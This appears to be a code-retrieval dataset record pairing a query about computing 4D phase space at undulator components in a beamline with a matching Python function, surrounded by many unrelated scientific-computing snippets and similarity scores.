* phi_s * 10**(0.4 * (M_s - M) * (alpha + 1)) * n.e**(-10**(0.4 * (M_s - M)))", "def analyze(self, event):\n nloSF = 1.0\n boson_pt=0\n mjj=0\n #print ' - event %d:'%(event._entry)\n\n if self._worker: \n\n genParticles = Collection(event, \"GenPart\")\n boson_found = False\n lep1 = None\n lep2 = None\n for part in genParticles:\n #if ( (part.pdgId == 23 or abs(part.pdgId) == 24) and (part.statusFlags & 0x2000)>0 and (part.statusFlags & 0x100)>0 ):\n if ( (abs(part.pdgId)>10 and abs(part.pdgId) < 17) and ( (part.status == 1 and (part.statusFlags & 0x1)>0) or ((part.statusFlags & 0x1)>0 and (part.statusFlags & 0x2)>0) ) ):\n if (part.genPartIdxMother>=0):\n mother = genParticles[part.genPartIdxMother]\n #print ' --- event %d pdgid %d --- pdg mother %d: %d '%(event._entry,part.pdgId,part.genPartIdxMother,mother.pdgId)\n \n if (mother.pdgId == 23 or abs(mother.pdgId) == 24):\n boson_pt = mother.pt\n boson_found = True\n break\n else:\n if (part.pdgId>0):\n lep1 = part\n else:\n lep2 = part\n\n else:\n #print ' --- event %d pdgid %d --- no mother'%(event._entry,part.pdgId)\n if (part.pdgId>0):\n lep1 = part\n else:\n lep2 = part\n\n if (not boson_found and lep1 is not None and lep2 is not None):\n boson_pt = (lep1.p4()+lep2.p4()).Pt()\n boson_found = True\n\n if (not boson_found):\n idx=0\n print ' --- event %d boson not found:'%(event._entry)\n for part in genParticles:\n print ' ------ part %d: pdgid %d pT %3.3f status %d flags %d mother %d'%(idx,part.pdgId,part.pt,part.status,part.statusFlags,part.genPartIdxMother)\n idx += 1\n\n #if (part.genPartIdxMother>=0):\n #print ' ------ pdg mother %d: %d '%(part.genPartIdxMother,genParticles[part.genPartIdxMother].pdgId)\n\n\n\n genJets = Collection(event, \"GenJet\")\n #idx = 0\n #for genjet in genJets:\n # print 'Jet %d: pT=%3.3f GeV'%(idx,genjet.pt)\n # idx += 1\n if (len(genJets)>1):\n mjj = (genJets[0].p4()+genJets[1].p4()).M()\n \n nloSF = self._worker.getSF(boson_pt,mjj)\n if boson_found: self.counter += 1\n\n self.out.fillBranch(\"nloSF_%s\"%(self.process),nloSF)\n self.out.fillBranch(\"gen_boson_pt\",boson_pt)\n self.out.fillBranch(\"gen_mjj\",mjj)\n return True", "def _update_ps(self, es):\n if not self.is_initialized:\n self.initialize(es)\n if self._ps_updated_iteration == es.countiter:\n return\n z = es.isotropic_mean_shift\n if es.opts['CSA_clip_length_value'] is not None:\n vals = es.opts['CSA_clip_length_value']\n try: len(vals)\n except TypeError: vals = [-np.inf, vals]\n if vals[0] > 0 or vals[1] < 0:\n raise ValueError(\n \"\"\"value(s) for option 'CSA_clip_length_value' = %s\n not allowed\"\"\" % str(es.opts['CSA_clip_length_value']))\n min_len = es.N**0.5 + vals[0] * es.N / (es.N + 2)\n max_len = es.N**0.5 + vals[1] * es.N / (es.N + 2)\n act_len = _norm(z)\n new_len = Mh.minmax(act_len, min_len, max_len)\n if new_len != act_len:\n z *= new_len / act_len\n # z *= (es.N / sum(z**2))**0.5 # ==> sum(z**2) == es.N\n # z *= es.const.chiN / sum(z**2)**0.5\n self.ps = (1 - self.cs) * self.ps + _sqrt(self.cs * (2 - self.cs)) * z\n self._ps_updated_iteration = es.countiter", "def _analyze(self):\n self.sim_setup_name, self.sweep_name = self.renderer.initialize_drivenmodal(\n **self.setup)\n\n self.renderer.analyze_sweep(self.sweep_name, self.sim_setup_name)\n # TODO: return the impedance, admittance and scattering matrices for later use", "def fs2ps2D(px, s):\n\t\tsfun = psarclength(px)\t\n\t\treturn sfun-s", "def analyse(self):\n self.__try_fitting()\n self.second.rotate()\n self.__try_fitting()", "def enrich_params(self):\n\n 
self.params['nmaps'] = len(self.params['probes']) + np.sum(self.params['spins'] == 2)\n\n pass", "def compute_embeddings(self, prop_state, A):\n ## PROP state is initialized to Annotation somewhere before\n for i_step in range(self.n_steps):\n # print (\"PROP STATE SIZE:\", prop_state.size()) #batch size x |V| x state dim\n in_states = []\n out_states = []\n\n # in_fcs[i] -> in_fcs.__getitem__(i) -> self.in_{i}, which is a linear layer state_dim -> state_dim\n for i in range(self.n_edge_types):\n in_states.append(self.in_fcs[i](prop_state))\n out_states.append(self.out_fcs[i](prop_state))\n in_states = tt.stack(in_states).transpose(0, 1).contiguous() # Batch, edge, node, embed\n in_states = in_states.view(-1, self.n_nodes*self.n_edge_types, self.state_dim)\n out_states = tt.stack(out_states).transpose(0, 1).contiguous()\n out_states = out_states.view(-1, self.n_nodes*self.n_edge_types, self.state_dim) # batch size x |V||E| x state dim\n\n prop_state = self.propagator(in_states, out_states, prop_state, A)\n\n return prop_state", "def sensor_model(particle_poses, beacon_pose, beacon_loc):\n \n \n\n M = particle_poses.shape[0]\n particle_weights = np.zeros(M)\n \n # TODO. For each particle calculate its weight based on its pose,\n # the relative beacon pose, and the beacon location.\n\n\n if sensor_model_on:\n #becon conditioning\n #camera_to_robot = (0.1, 0.1, 0)\n becon_pose_robot = transform_pose(camera_to_robot, beacon_pose )\n\n #print(beacon_pose)\n #print(becon_pose_robot)\n \n #liekelyhood functions\n becon_range = np.sqrt((becon_pose_robot[0])**2 + (becon_pose_robot[1])**2)\n becon_angle = becon_pose_robot[2]\n\n #print(becon_range)\n #print(becon_angle * 180 / np.pi)\n \n \n for m in range(M):\n\n if sensor_model_on:\n \n x_b = beacon_loc[0]\n y_b = beacon_loc[1]\n x_p = particle_poses[m][0] #particle position in map frame\n y_p = particle_poses[m][1]\n theta_p = particle_poses[m][2]\n \n \n range_p2b = np.sqrt((x_b - x_p)**2 + (y_b - y_p)**2) #range from particle to becon\n b_angle_map = arctan2((y_b - y_p), (x_b-x_p))\n\n \n angle_p2b = angle_difference(theta_p, b_angle_map)\n\n rangeerror = gauss(becon_range - range_p2b, 0, sigma_r)\n angleerror = gauss(becon_angle - angle_p2b, 0, sigma_theta)\n \n particle_weights[m] = rangeerror * angleerror\n\n #print(rangeerror, angleerror)\n\n else:\n particle_weights[m] = 1\n\n return particle_weights" ]
[ "0.55478334", "0.55464554", "0.5515675", "0.54473466", "0.5417652", "0.5381833", "0.533846", "0.5251011", "0.5237646", "0.5210435", "0.5204704", "0.51945657", "0.5185809", "0.5178469", "0.5154056", "0.5144773", "0.51260614", "0.51221514", "0.51218563", "0.5119552", "0.51158684", "0.50984854", "0.5088232", "0.5085409", "0.50832456", "0.5081795", "0.5078837", "0.5055984", "0.5054278", "0.5021221", "0.50061464", "0.50017756", "0.49990347", "0.49976492", "0.4994555", "0.49881738", "0.49845457", "0.4982704", "0.49672833", "0.4966584", "0.49628675", "0.49092424", "0.49044994", "0.48884994", "0.48786613", "0.48776644", "0.48713046", "0.48668018", "0.48629025", "0.48566428", "0.48555478", "0.48529416", "0.48492557", "0.4846475", "0.48424006", "0.48394534", "0.48394448", "0.48368528", "0.48352027", "0.48345417", "0.48336497", "0.48317903", "0.48243943", "0.48242962", "0.48234555", "0.48200732", "0.48167074", "0.48103496", "0.48097575", "0.48088795", "0.48014048", "0.48008606", "0.4800791", "0.47976035", "0.4787659", "0.4787357", "0.4786", "0.47846553", "0.4781463", "0.4779777", "0.47793058", "0.4779063", "0.47738695", "0.47695833", "0.47682822", "0.47650847", "0.47634882", "0.4758798", "0.4752254", "0.47515708", "0.47492227", "0.47489268", "0.4746346", "0.47441941", "0.47408593", "0.47406086", "0.4732437", "0.47273412", "0.47259226", "0.47236213" ]
0.63167745
0
I want to use this function to calculate the 4D phase space at the end of some components in the undulator beamline.
def analyze_phase_space_at_end(ps_beg, beamline, beamline_id, id_slices, N_bin):
    phase_spc = ps_beg

    ## Count how many times the class beamline_id occurs in the beamline
    count_beamline = 0
    for element in beamline:
        if isinstance(element, beamline_id):
            count_beamline += 1

    ps_end = np.zeros((4, count_beamline, N_bin))

    count_id = 0
    for element in beamline:
        # Propagate the 4D phase space through this element's linear map
        phase_spc = np.dot(element.M1, phase_spc) + element.M2
        if isinstance(element, beamline_id):
            # Record the slice-wise phase space at the exit of this element
            ps_along_s = beam_property_along_s(phase_spc, id_slices)
            ps_end[0, count_id, :] = ps_along_s[0, :]
            ps_end[1, count_id, :] = ps_along_s[1, :]
            ps_end[2, count_id, :] = ps_along_s[2, :]
            ps_end[3, count_id, :] = ps_along_s[3, :]
            count_id += 1

    return ps_end
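A minimal usage sketch for the query above. The Drift and UndulatorSegment element classes, their linear M1/M2 transport maps, the stand-in beam_property_along_s, and all numeric values below are illustrative assumptions, not part of the original beamline code; they only show how the function's arguments fit together.

import numpy as np

class Drift:
    """Hypothetical beamline element with a linear 4D transport map."""
    def __init__(self, L):
        # (x, x', y, y') drift of length L; no dipole-like offset term.
        self.M1 = np.array([[1.0, L, 0.0, 0.0],
                            [0.0, 1.0, 0.0, 0.0],
                            [0.0, 0.0, 1.0, L],
                            [0.0, 0.0, 0.0, 1.0]])
        self.M2 = np.zeros((4, 1))

class UndulatorSegment(Drift):
    """Marker subclass passed as beamline_id to select where ps_end is sampled."""

def beam_property_along_s(phase_spc, id_slices):
    # Stand-in: average (x, x', y, y') over the particles of each longitudinal slice.
    return np.stack([phase_spc[:, idx].mean(axis=1) for idx in id_slices], axis=1)

# 1000 macro-particles split into N_bin = 10 slices along the bunch.
rng = np.random.default_rng(0)
ps_beg = rng.normal(scale=1e-4, size=(4, 1000))
id_slices = np.array_split(np.arange(1000), 10)

beamline = [Drift(0.5), UndulatorSegment(3.0), Drift(0.5), UndulatorSegment(3.0)]
ps_end = analyze_phase_space_at_end(ps_beg, beamline, UndulatorSegment, id_slices, N_bin=10)
print(ps_end.shape)  # (4, 2, 10): phase space at the exit of each undulator segment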
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def make_phasedbeam(self):\n\n self.phasedbeam = n.zeros((len(self.dmarr),len(self.reltime)), dtype='float64')\n\n for i in xrange(len(self.dmarr)):\n self.phasedbeam[i] = self.dedisperse(dmbin=i).mean(axis=3).mean(axis=2).mean(axis=1).real # dedisperse and mean\n print 'dedispersed for ', self.dmarr[i]", "def make_phasedbeam(self):\n\n self.phasedbeam = n.zeros((len(self.dmarr),len(self.reltime)), dtype='float64')\n\n for i in xrange(len(self.dmarr)):\n for j in xrange(len(self.reltime)): \n# for j in xrange(0, len(self.reltime), max(1,self.twidths[i]/2)): # can also step by twidth/2, but leaves gaps in data products\n dmtrack = self.dmtrack(dm=self.dmarr[i], t0=self.reltime[j])\n if ((dmtrack[1][0] == 0) & (dmtrack[1][len(dmtrack[1])-1] == len(self.chans)-1)): # use only tracks that span whole band\n truearr = n.ones( (len(dmtrack[0]), self.nbl, self.npol))\n falsearr = n.zeros( (len(dmtrack[0]), self.nbl, self.npol))\n selection = self.data[dmtrack[0], :, dmtrack[1], :]\n weightarr = n.where(selection != 0j, truearr, falsearr) # ignore zeros in mean across channels # bit of a hack\n try:\n self.phasedbeam[i,j] = n.average(selection, weights=weightarr).real\n except ZeroDivisionError:\n self.phasedbeam[i,j] = n.mean(selection).real # if all zeros, just make mean # bit of a hack\n print 'dedispersed for ', self.dmarr[i]", "def make_phasedbeam(self):\n raise NotImplementedError('For now, you could instead used dispersion code with dmarr=[0.]...')", "def getPhase(phase):", "def get_phase_space(self, grid_flag):\n\n f = h5py.File(self.xs_path, 'r')\n self.N = f['paramdescrip']['NVALUE'].value # det maximum range Ni for each d_i\n phase_space = {}\n order = {}\n NPAR = f['paramdescrip']['NPAR'].value[0]\n for di in range(NPAR - 1):\n di_name = f['paramdescrip']['PARNAM'].value[di] # get names for dimensions. Starts at 0\n # get values for dimensions. Starts at 1. e.g. 'BURNUP': array([ 0., 9.35253143, 18.70503998,..\n # Is saved as a np.array, of floats64 FORTRAN-contiguous\n phase_space[di_name] = np.array([float(val) for val in f['paramvaleurs'][\n 'pval %d' % (di + 1)].value], order='F')\n order[di] = di_name # e.g. '7': 'BURNUP'\n\n iso_aux = []\n # just concatenate those two\n for iso in f['contenu']['NOMISO'].value[:]:\n iso_aux.append(iso)\n for iso in f['contenu']['NOMMAC'].value[:]:\n iso_aux.append(iso)\n f.close()\n self.iso_A2 = iso_aux\n\n # USER IMPOSED: Non-independant variables set to [0].\n \"\"\"\n *Do not eliminate them, this will bring problems with the cartesin product later one\n *if instead of '[phase_space['PHASE'][0]]' (which is equal to 1) just '[1]' is written then np.where() does not recognize the value.\n\n This two problems rise from the decision of defining the 'space of interest' as a subset from the 'phase space' which in time is read directly from the H5F file. Later several comparisons are made between the two. The upside is the need for no explicit declaration of the phase-space thus minimizing chances of un-noticed error in domain assignation.\n \"\"\"\n if 'PHASE' in phase_space.keys():\n phase_space['PHASE'] = [phase_space['PHASE'][0]]\n if 'BURNUPstep' in phase_space.keys():\n phase_space['BURNUPstep'] = [phase_space['BURNUPstep'][0]]\n\n if grid_flag == 'SG': # major update required\n \"\"\"\n In contras to FG, the stored values in the concatenated SAPHYB file only considers different burnup steps, i.e a set of values [0, 500, 500, 100] are stored as [0, 500, 100]. 
Two posibilities remain, read the BURNUP value from the single XS files separatly or load a pickeled object with the phase space. The second option was implemented.\n \"\"\"\n with open(self.file_path + self.xs_folder + 'phase_space.pickle', 'rb') as handle:\n phase_space_pk = pickle.load(handle)\n phase_space_pk.pop('a')\n phase_space_pk.pop('d')\n phase_space_pk.pop('l')\n phase_space_pk.pop('BURNUP_evol')\n phase_space_pk.pop('BURNUP_steps')\n phase_space = phase_space_pk\n\n self.phase_space, self.order, self.d, self.NPAR = phase_space, order, len(order), NPAR", "def detect_phasedbeam(self):\n raise NotImplementedError('For now, you could instead used dispersion code with dmarr=[0.]...')", "def GetPhase(self):\n ...", "def Magnus4(self,direction='x'):\n self.reset()\n self.mol.orthoDen()\n self.mol.orthoFock()\n h = -1j*self.stepsize\n for idx,time in enumerate((self.time)):\n if direction.lower() == 'x':\n self.mol.computeDipole()\n self.dipole.append(np.real(self.mol.mu[0]))\n elif direction.lower() == 'y':\n self.mol.computeDipole()\n self.dipole.append(np.real(self.mol.mu[1]))\n elif direction.lower() == 'z':\n self.mol.computeDipole()\n self.dipole.append(np.real(self.mol.mu[2]))\n # record pulse envelope for later plotting, etc.\n self.shape.append(self.pulse(time))\n curDen = np.copy(self.mol.PO)\n \n self.addField(time + 0.0*self.stepsize,direction=direction)\n k1 = h*self.mol.FO \n Q1 = k1\n U = expm(0.5*Q1)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n self.addField(time + 0.5*self.stepsize,direction=direction)\n k2 = h*self.mol.FO\n Q2 = k2 - k1\n U = expm(0.5*Q1 + 0.25*Q2)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n\n self.addField(time + 0.5*self.stepsize,direction=direction)\n k3 = h*self.mol.FO\n Q3 = k3 - k2\n U = expm(Q1 + Q2)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n\n self.addField(time + 1.0*self.stepsize,direction=direction)\n k4 = h*self.mol.FO\n Q4 = k4 - 2*k2 + k1\n L = 0.5*Q1 + 0.25*Q2 + (1/3.)*Q3 - (1/24.)*Q4\n L += -(1/48.)*self.mol.comm(Q1,Q2)\n U = expm(L)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n self.addField(time + 0.5*self.stepsize,direction=direction)\n k5 = h*self.mol.FO\n Q5 = k5 - k2 \n L = Q1 + Q2 + (2/3.)*Q3 + (1/6.)*Q4 - (1/6.)*self.mol.comm(Q1,Q2)\n U = expm(L)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n self.addField(time + 1.0*self.stepsize,direction=direction)\n k6 = h*self.mol.FO\n Q6 = k6 -2*k2 + k1\n L = Q1 + Q2 + (2/3.)*Q5 + (1/6.)*Q6\n L += -(1/6.)*self.mol.comm(Q1, (Q2 - Q3 + Q5 + 0.5*Q6))\n\n U = expm(L)\n self.mol.PO = np.dot(U,np.dot(curDen,self.mol.adj(U))) \n self.mol.updateFock()\n \n # density and Fock are done updating, wrap things up\n self.mol.unOrthoFock() \n self.mol.unOrthoDen() \n self.mol.computeEnergy()\n self.Energy.append(np.real(self.mol.energy))", "def create_phase_separator():\n cost_operators = []\n reduced_distance_matrix = np.delete(distance_matrix, starting_node, axis=0)\n reduced_distance_matrix = np.delete(reduced_distance_matrix, starting_node, axis=1)\n reduced_number_of_nodes = len(reduced_distance_matrix)\n number_of_qubits = reduced_number_of_nodes ** 2\n\n for t in range(reduced_number_of_nodes - 1):\n for city_1 in range(reduced_number_of_nodes):\n for city_2 in range(reduced_number_of_nodes):\n if city_1 != city_2:\n distance = reduced_distance_matrix[city_1, city_2] \n qubit_1 = t * 
(reduced_number_of_nodes) + city_1\n qubit_2 = (t + 1) * (reduced_number_of_nodes) + city_2\n cost_operators.append(PauliTerm(\"Z\", qubit_1, distance) * PauliTerm(\"Z\", qubit_2))\n\n costs_to_starting_node = np.delete(distance_matrix[:, starting_node], starting_node)\n for city in range(reduced_number_of_nodes):\n distance_from_0 = -costs_to_starting_node[city]\n qubit = city\n cost_operators.append(PauliTerm(\"Z\", qubit, distance_from_0))\n\n for city in range(reduced_number_of_nodes):\n distance_from_0 = -costs_to_starting_node[city]\n qubit = number_of_qubits - (reduced_number_of_nodes) + city\n cost_operators.append(PauliTerm(\"Z\", qubit, distance_from_0))\n\n phase_separator = [PauliSum(cost_operators)]\n return phase_separator", "def phase(self):\n pass", "def get_entangling_phase (self, numpoints=512):\n\n t = np.linspace(self.t_dress_begin, self.t_undress_end, num=numpoints)\n\n Omega = np.empty(t.shape)\n dOmega_dt = np.empty(t.shape)\n Delta = np.empty(t.shape)\n dDelta_dt = np.empty(t.shape)\n\n kappa = np.empty(t.shape)\n\n for n in range(t.shape[0]):\n Omega[n], dOmega_dt[n] = self.get_Omega(t=t[n])\n Delta[n], dDelta_dt[n] = self.get_Delta(t=t[n])\n\n kappa[n] = self.get_kappa(t=t[n])\n\n phase_entangle = scipy.integrate.cumtrapz(kappa, t)[-1]\n\n return phase_entangle", "def _body_phase(acc_z, hz):\n phase = _phase_detect(acc_z)\n\n # Determing start and end of movement phase for right foot\n change = np.ediff1d(phase, to_begin=0)\n start_mov = np.where(change == 1)[0]\n end_mov = np.where(change == -1)[0]\n\n # if data ends with movement, assign final point as end of movement\n if len(start_mov) != len(end_mov):\n end_mov = np.append(end_mov, len(acc_z))\n del acc_z # delete acc_z, no use in further computations\n\n start_mov = list(start_mov)\n end_mov = list(end_mov)\n if phase[0] == 1:\n start_mov.insert(0, 0)\n # Assign first 10 data points of movement phase as balance (take_off)\n # TODO Change this to actually have take-off phase\n tf_win = int(0.30 * hz) # window for take_off\n for i in start_mov:\n phase[i:i + tf_win] = [0] * len(phase[i:i + tf_win])\n for j in end_mov:\n phase[j - tf_win:j] = [0] * len(phase[j - tf_win:j])\n return np.array(phase), start_mov, end_mov", "def ramp4p(params, phase, args=dict(n=5, guess=[1, -0.068, 2.33, 0.933, -20.5])):\n # 2013-12-07 14:08 IJMC: Created.\n\n return params[0] * (1. 
+ np.exp(-params[1]*phase + params[2]) + \\\n params[3] * (phase - 0.5) + \\\n params[4] * (phase - 0.5)**2)", "def perform_phase_processing(LP_solver=\"pyglpk\"):\n radar = pyart.testing.make_single_ray_radar()\n phidp, kdp = pyart.correct.phase_proc_lp(radar, 0.0, LP_solver=LP_solver)\n return radar, phidp, kdp", "def app_phase(data_pupil,data_phase,oversize=4):\n return phaseangle(app_complex(data_pupil,data_phase,oversize))", "def analyze_on_axis(phase_space, id_begin, id_end, ds_slice, zplot):\n\n ps = phase_space[:, (id_begin-1):id_end, :]\n # print(np.shape(ps))\n # ps = ps[numpy.logical_not(numpy.isnan(ps))]\n\n x = ps[0, :, :]\n px = ps[1, :, :]\n y = ps[2, :, :]\n py = ps[3, :, :]\n\n id_on_axis = np.zeros((4, int(id_end-id_begin+1)))\n\n for n in range(int(id_end-id_begin+1)):\n x_this = x[n, :]\n px_this = px[n, :]\n y_this = y[n, :]\n py_this = py[n, :]\n\n # Remove all NAN elements in the phase space array\n x_this = x_this[np.logical_not(np.isnan(x_this))]\n px_this = px_this[np.logical_not(np.isnan(px_this))]\n y_this = y_this[np.logical_not(np.isnan(y_this))]\n py_this = py_this[np.logical_not(np.isnan(py_this))]\n\n ## Plot X\n plt.subplot(2, 2, 1)\n plt.plot(zplot[0:len(x_this)]*1e+6, x_this*1e+6)\n plt.ylabel('Position in X/ $\\mu$m', fontsize=10)\n\n ## Plot Y\n plt.subplot(2, 2, 2)\n plt.plot(zplot[0:len(y_this)]*1e+6, y_this*1e+6)\n plt.ylabel('Position in Y/ $\\mu$m', fontsize=10)\n\n ## Plot px\n plt.subplot(2, 2, 3)\n plt.plot(zplot[0:len(px_this)]*1e+6, px_this)\n plt.ylabel('Angle in X', fontsize=10)\n\n ## Plot py\n plt.subplot(2, 2, 4)\n plt.plot(zplot[0:len(py_this)]*1e+6, py_this)\n plt.ylabel('Angle in Y', fontsize=10)\n\n\n # plt.xlabel('Longitudianl Direction of the Bunch $s$/ $\\mu$m')\n # plt.title('First Undulator Section')\n # plt.title('Second Undulator Section')\n # plt.title('Third Undulator Section')\n\n id_on_axis[0, n] = np.argmin(np.abs(x_this))\n id_on_axis[1, n] = np.argmin(np.abs(px_this))\n id_on_axis[2, n] = np.argmin(np.abs(y_this))\n id_on_axis[3, n] = np.argmin(np.abs(py_this))\n\n fig = plt.gcf()\n fig.set_size_inches(13.5, 9)\n ax = plt.gca()\n ax.yaxis.get_major_formatter().set_powerlimits((0,1))\n fig.savefig('phase_space_U3_new.png', dpi=100)\n plt.show()\n\n\n s_on_axis = np.average(id_on_axis[2:4,:])*ds_slice\n\n return id_on_axis, s_on_axis", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H1 + sigma_H1\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def plot_phase_plane_closed_loop(self , x_axis = 0 , y_axis = 1 ):\n\n pp = phaseanalysis.PhasePlot( self , x_axis , y_axis )\n \n pp.compute_grid()\n pp.plot_init()\n \n # Closed-loop Behavior\n pp.color = 'r'\n 
pp.compute_vector_field()\n pp.plot_vector_field()\n \n # Open-Loop Behavior\n pp.f = self.plant.f\n pp.ubar = self.plant.ubar\n pp.color = 'b'\n pp.compute_vector_field()\n pp.plot_vector_field()\n \n pp.plot_finish()\n \n pp.phasefig.show()\n \n return pp", "def phase(self):\r\n\r\n #XXX calcluate this from the standard output, instead of recalculating:\r\n\r\n tseries_length = self.input.data.shape[0]\r\n spectrum_length = self.spectrum.shape[-1]\r\n\r\n phase = np.zeros((tseries_length,\r\n tseries_length,\r\n spectrum_length))\r\n\r\n for i in range(tseries_length):\r\n for j in range(i, tseries_length):\r\n phase[i][j] = np.angle(\r\n self.spectrum[i][j])\r\n\r\n phase[j][i] = np.angle(\r\n self.spectrum[i][j].conjugate())\r\n return phase", "def get_dihedral(p0,p1,p2,p3,unit):\n if unit == 'Ang':\n p0 = p0*0.529177249\n p1 = p1*0.529177249\n p2 = p2*0.529177249\n p3 = p3*0.529177249\n\n b0 = -1.0*(p1 - p0)\n b1 = p2 - p1\n b2 = p3 - p2\n\n # normalize b1 so that it does not influence magnitude of vector\n # rejections that come next\n b1 /= linalg.norm(b1)\n\n # vector rejections\n # v = projection of b0 onto plane perpendicular to b1\n # = b0 minus component that aligns with b1\n # w = projection of b2 onto plane perpendicular to b1\n # = b2 minus component that aligns with b1\n v = b0 - dot(b0, b1)*b1\n w = b2 - dot(b2, b1)*b1\n\n # angle between v and w in a plane is the torsion angle\n # v and w may not be normalized but that's fine since tan is y/x\n x = dot(v, w)\n y = dot(cross(b1, v), w)\n return degrees(arctan2(y, x))\n\n #q1 = subtract(p1,p0) # b - a \n #q2 = subtract(p2,p1) # c - b \n #q3 = subtract(p3,p2) # d - c\n #print(q1,q2)\n\n #q1_x_q2 = cross(q1,q2) \n #q2_x_q3 = cross(q2,q3)\n\n #n1 = q1_x_q2/sqrt(dot(q1_x_q2,q1_x_q2)) \n #n2 = q2_x_q3/sqrt(dot(q2_x_q3,q2_x_q3))\n\n #u1 = n2\n #u3 = q2/(sqrt(dot(q2,q2))) \n #u2 = cross(u3,u1)\n\n #cos_theta = dot(n1,u1)\n #sin_theta = dot(n1,u2)\n ## Calculate theta\n #theta = -atan2(sin_theta,cos_theta)\n ## it is different from atan2 from fortran math.atan2(y,x)\n #theta_deg = degrees(theta)\n #return(theta_deg)", "def lane_emden_step(x,y,dx,n,w):\n _solver.rk4(x,y[0],y[1],dx,n,w)\n out = _solver.rk4out\n return np.array([out.z0,out.z1])", "def get_trace_phase(self, linear_comp=False):\n eps = self.phase_thr\n\n if self.Et is not None:\n # Center peak in time\n ind = np.argmax(abs(self.Et))\n shift = (self.Et.shape[0] / 2 - ind).astype(int)\n Et = np.roll(self.Et, shift)\n\n # Unravelling 2*pi phase jumps\n ph0_ind = np.int(Et.shape[0] / 2) # Center index\n ph = np.angle(Et)\n ph_diff = np.diff(ph)\n # We need to sample often enough that the difference in phase is less than 5 rad\n # A larger jump is taken as a 2*pi phase jump\n ph_ind = np.where(np.abs(ph_diff) > 5.0)\n # Loop through the 2*pi phase jumps\n for ind in ph_ind[0]:\n if ph_diff[ind] < 0:\n ph[ind + 1:] += 2 * np.pi\n else:\n ph[ind + 1:] -= 2 * np.pi\n\n # Find relevant portion of the pulse (intensity above a threshold value)\n ph0 = ph[ph0_ind]\n Et_mag = np.abs(Et)\n low_ind = np.where(Et_mag < eps)\n ph[low_ind] = np.nan\n\n # Here we could go through contiguous regions and make the phase connect at the edges...\n\n # Linear compensation is we have a frequency shift (remove 1st order phase)\n if linear_comp is True:\n idx = np.isfinite(ph)\n x = np.arange(Et.shape[0])\n ph_poly = np.polyfit(x[idx], ph[idx], 1)\n ph_out = ph - np.polyval(ph_poly, x)\n else:\n ph_out = ph - ph0\n else:\n ph_out = None\n return ph_out", "def phase_offset(frq,start,base):\r\n \r\n 
if type(start)==datetime:\r\n dx = start - base\r\n dx = dx.total_seconds()\r\n else:\r\n dx = start -base\r\n \r\n return np.mod(dx*np.array(frq),2*np.pi)", "def phaseshift(self, dl=0, dm=0, im=[[0]], size=0):\n\n ang = lambda dl,dm,u,v,freq: (dl*n.outer(u,freq/self.freq_orig[0]) + dm*n.outer(v,freq/self.freq_orig[0])) # operates on single time of u,v\n\n if ((len(im) != 1) & (size != 0)):\n y,x = n.where(im == im.max())\n length = len(im)\n dl = (length/2 - x[0]) * 1./size\n dm = (y[0] - length/2) * 1./size\n print 'Shifting phase center to image peak: (dl,dm) = (%e,%e) = (%e,%e) arcsec' % (dl, dm, n.degrees(dl)*3600, n.degrees(dm)*3600)\n elif isinstance(dl,n.ndarray) and isinstance(dm,n.ndarray):\n if not len(dl) == self.nints:\n raise ValueError('dl is an array but its length (%d) does not match the number of integrations (%d)' % (len(dl),self.nints))\n \n elif ((dl != 0) | (dm != 0)):\n print 'Shifting phase center by given (dl,dm) = (%e,%e) = (%e,%e) arcsec' % (dl, dm, n.degrees(dl)*3600, n.degrees(dm)*3600)\n dl = dl * n.ones(self.nints)\n dm = dm * n.ones(self.nints)\n else:\n raise ValueError('Need to give either dl or dm, or im and size.')\n\n for i in xrange(self.nints):\n for pol in xrange(self.npol):\n self.data[i,:,:,pol] = self.data[i,:,:,pol] * n.exp(-2j*n.pi*ang(dl[i], dm[i], self.u[i], self.v[i], self.freq))\n \n self.l0 = self.l0 + dl\n self.m0 = self.m0 + dm\n self.dataph = (self.data.mean(axis=3).mean(axis=1)).real # multi-pol\n self.min = self.dataph.min()\n self.max = self.dataph.max()\n print 'New dataph min, max:'\n print self.min, self.max", "def phase(self):\r\n return 0.2 * self.weights", "def backward_phi(self):\n for f in self.component_fields:\n f.require_grid_space()", "def ramp4n(params, phase, args=dict(n=5, guess=[1, -3.7e-4, -0.94, 0.087, -1.08])):\n # 2013-12-07 14:08 IJMC: Created.\n\n return params[0] * (1. - np.exp(-params[1]*phase + params[2]) + \\\n params[3] * (phase - 0.5) + \\\n params[4] * (phase - 0.5)**2)", "def d4out():\n\td4x.moveTo(d4x_out)\n\td4y.moveTo(d4y_out)", "def phaseEstimator2(phases,omegas,T_s,k):\n \n \n length = phases.shape[0]\n pis = np.tile(2*np.pi,length)\n a = phases - k*omegas\n phaseShifts = np.mod(a,pis)\n\n averagedPhaseShift = np.sum(phaseShifts)/length\n \n estimatedPhase = np.mod(averagedPhaseShift + k*omegas,pis)\n #estimatedPhase = 